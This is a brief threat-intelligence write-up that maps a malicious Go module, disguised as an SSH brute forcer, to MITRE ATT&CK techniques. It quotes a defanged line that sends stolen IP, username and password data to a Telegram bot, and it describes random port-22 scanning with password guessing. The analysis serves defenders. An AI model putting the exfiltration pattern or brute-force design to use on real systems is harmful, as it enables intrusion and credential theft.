Malicious Go Module Disguised as SSH Brute Forcer Exfiltrates Credentials via Telegram

MITRE Techniques

• [T1195.002] Supply Chain Compromise – Malicious module published in Go module ecosystem posing as useful tooling, enabling compromise through dependency consumption: “malicious Go module package, golang-random-ip-ssh-bruteforce”
• [T1608.001] Stage Capabilities: Upload Malware – Threat actor hosts offensive utilities and uploads malicious tooling to public repos for distribution: “The threat actor’s GitHub account hosts the brute forcer and other offensive utilities”
• [T1204.002] User Execution: Malicious File – The package relies on operators running the provided utility to execute the malicious behavior: “anyone who runs the package hands over their initial access wins to the Russian-speaking threat actor”
• [T1046] Network Service Discovery – The code probes random IPv4 addresses for open TCP/22 to discover SSH services: “generates random IPv4 addresses, probes TCP 22 with a short timeout”
• [T1110.001] Brute Force: Password Guessing – Attempts authentication using a local username-password wordlist to guess SSH credentials: “launches concurrent SSH logins from a local wordlist”
• [T1021.004] Remote Services: SSH – Uses SSH protocol to attempt remote logins and disable host key checks to skip verification: “HostKeyCallback: ssh.InsecureIgnoreHostKey() to skip server identity checks”
• [T1071.001] Application Layer Protocol: Web Protocols – Exfiltrates credentials using HTTP(s) requests to the Telegram Bot API endpoint: “http.Get(‘https://api.telegram[.]org/bot…/sendMessage?…&text=’ + data)”
• [T1567] Exfiltration Over Web Service – Sends stolen ip:user:pass to a hardcoded Telegram bot/chat over the Telegram Bot API: “sends the target IP, username, and password to a hardcoded Telegram bot and chat controlled by the threat actor”